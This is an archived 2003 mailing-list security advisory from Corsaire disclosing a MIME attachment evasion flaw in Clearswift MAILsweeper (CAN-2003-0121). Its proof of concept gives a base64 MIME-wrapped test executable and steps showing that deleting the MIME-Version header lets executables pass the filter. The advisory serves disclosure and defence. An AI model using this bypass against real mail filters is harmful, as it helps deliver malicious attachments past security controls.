Corsaire Security Advisory - Clearswift MAILsweeper MIME attachme nt evasion issue

From: Martin O'Neal (bugtraqat_private)
Date: Fri Mar 07 2003 - 10:48:18 PST

Next message: EnGarde Secure Linux: "[ESA-20030307-008] 'file' ELF parsing routine buffer overflow vulnerability."

Previous message: Daniel Ahlberg: "GLSA: snort (200303-6.1)"
Next in thread: http-equivat_private: "Re: Corsaire Security Advisory - Clearswift MAILsweeper MIME attachme nt evasion issue"
Reply: http-equivat_private: "Re: Corsaire Security Advisory - Clearswift MAILsweeper MIME attachme nt evasion issue"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-- Corsaire Security Advisory --

Title: Clearswift MAILsweeper MIME attachment evasion issue
Date: 03.03.03
Application: Clearswift MAILsweeper 4.x
Environment: Windows NT 4.0, Windows 2000, 
Author: Martin O'Neal [martin.onealat_private]
Audience: General distribution


-- Scope --

The aim of this document is to clearly define a MIME attachment evasion 
issue in the MAILsweeper product, as supplied by Clearswift Ltd. [1] 


-- History --

Vendor notified: 03.03.03 
Uncoordinated vendor advisory released: 05.03.03
Document released: 06.03.03

Unfortunately the release of this advisory has not followed a 
particularly smooth path. The main reason for the rapid release schedule 
is due to an uncoordinated and unattributed advisory from Clearswift, 
released under their ThreatLab banner. Once this was made public, there 
seemed little point in delaying publishing the Corsaire advisory.

For the record, the sole response we have had from Clearswift in regard 
to this issue has been an apology from Pete Simpson (ThreatLab Manager) 
for the unattributed release (received after we complained about the 
omission). Other than this, no one from Clearswift has responded to the 
original advisory, or any of the follow-up emails.


-- Overview --

The MAILsweeper product provides policy based, email content security 
functionality. Part of this functionality allows the product to block 
attachments based on their specific content type.

However, by using malformed MIME encapsulation techniques this 
functionality can be evaded.


-- Analysis --

The attachment detection functionality works by recursively analysing 
the email message body and attachments for container constructs (such as 
MIME), decoding these and then comparing the contents against a 
predefined policy.

If a deliberately malformed MIME encapsulation technique is used, then 
the MAILsweeper product will not recognise the attachment and allows it 
to pass unhindered. 

However, not all client applications require strict standards compliance 
and some will happily accept and process the malformed attachment. 


-- Proof of concept --

For this proof of concept, the MIME encapsulation is simply modified to 
remove the MIME-Version header field. An example of an application that 
will process a MIME construct that is malformed in this way is Microsoft 
Internet Explorer.

Whilst RFC2045 states that all agents must include this field [2] it 
then goes on to say that "In the absence of a MIME-Version field, a 
receiving mail user agent (whether conforming to MIME requirements or 
not) may optionally choose to interpret the body of the message 
according to local conventions."

Step 1: On the MAILsweeper host create a new Data Type Manager with only 
the Executable type selected. Save and restart the MAILsweeper Security 
service.

Step 2: Now create a text file that will be used to hold the MIME 
encoded attachment. Start notepad (or another text editor), and paste 
in:

     MIME-Version: 1.0
     Content-Location:file:///executable.exe
     Content-Transfer-Encoding: base64

     TVp0AQIAAAAgAAgA//8YAIAAAAAQAAIAHgAAAAEAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAC4AQCO2I0WAgC0Cc0huCBMzSFFeGUhJCQJALH/
     /////wAAAAAAAFQBAAAAAAIAUkKL6IzABRAADh+jBAADB
     gwAjsCLDgYAi/lPi/f986RQuDQAUMuMw4zYSI7YjsC/Dw
     C5EACw//OuR4v3i8NIjsC/DwCxBIvG99DT6IzaK9BzBIz
     YK9LT4APwjtqLx/fQ0+iMwivQcwSMwCvS0+AD+I7CrIrQ
     Tq2LyEaKwiT+PLB1BazzqusGPLJ1bfOkisKoAXSxvjIBD
     h+LHgQA/DPSrYvI4xOLwgPDjsCti/iD//90ESYBHeLzgf
     oA8HQWgcIAEOvcjMBAjsCD7xAmAR1IjsDr4ovDiz4IAIs
     2CgAD8AEGAgAtEACO2I7AuwAA+o7Wi+f7i8Uu/y+0QLsC
     ALkWAIzKjtq6HAHNIbj/TM0hUGFja2VkIGZpbGUgaXMgY
     29ycnVwdAEAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAA=

Step 3: To reproduce this issue, send an email containing the attachment 
created in step 2 that will be processed by the scenario from step 1. 
This should result in a successful discovery condition. 

Step 4: Reopen the attachment from step 2 and remove the first line 
(MIME-Version: 1.0), then resend the attachment as per step 3. This 
should result in the attachment not being spotted as an executable.


-- Recommendations --

To be an effective tool, the MAILsweeper product must not only be able 
to process encoding techniques implemented as per the relevant standard, 
but also common misinterpretations.

As an ongoing process, a study project should be undertaken by 
Clearswift to identify applications that routinely decode MIME objects 
and have a liberal interpretation of the MIME standard. 

In response to this advisory, Clearswift have produced an updated script 
utility that can detect the malformed MIME header used in this example 
[3]. This should be implemented until a more permanent solution is 
forthcoming.


-- CVE --

The Common Vulnerabilities and Exposures (CVE) project has assigned
the name CAN-2003-0121 to this issue. This is a candidate for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.


-- References --

[1] http://www.clearswift.com
[2] http://www.rfc.net/rfc2045.html#s4.
[3] http://www.clearswift.com/support/threatlab/vbstool.asp


-- Revision --

a. Initial release.
b. Minor revision.
c. Added CVE reference.
d. Added Clearswift script tool reference.


-- Distribution --

This security advisory may be freely distributed, provided that it 
remains unaltered and in its original form. 


-- Disclaimer --

The information contained within this advisory is supplied "as-is" with 
no warranties or guarantees of fitness of use or otherwise. Corsaire 
accepts no responsibility for any damage caused by the use or misuse of 
this information.


Copyright 2003 Corsaire Limited. All rights reserved.

Next message: EnGarde Secure Linux: "[ESA-20030307-008] 'file' ELF parsing routine buffer overflow vulnerability."
Previous message: Daniel Ahlberg: "GLSA: snort (200303-6.1)"
Next in thread: http-equivat_private: "Re: Corsaire Security Advisory - Clearswift MAILsweeper MIME attachme nt evasion issue"
Reply: http-equivat_private: "Re: Corsaire Security Advisory - Clearswift MAILsweeper MIME attachme nt evasion issue"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sat Mar 08 2003 - 13:55:15 PST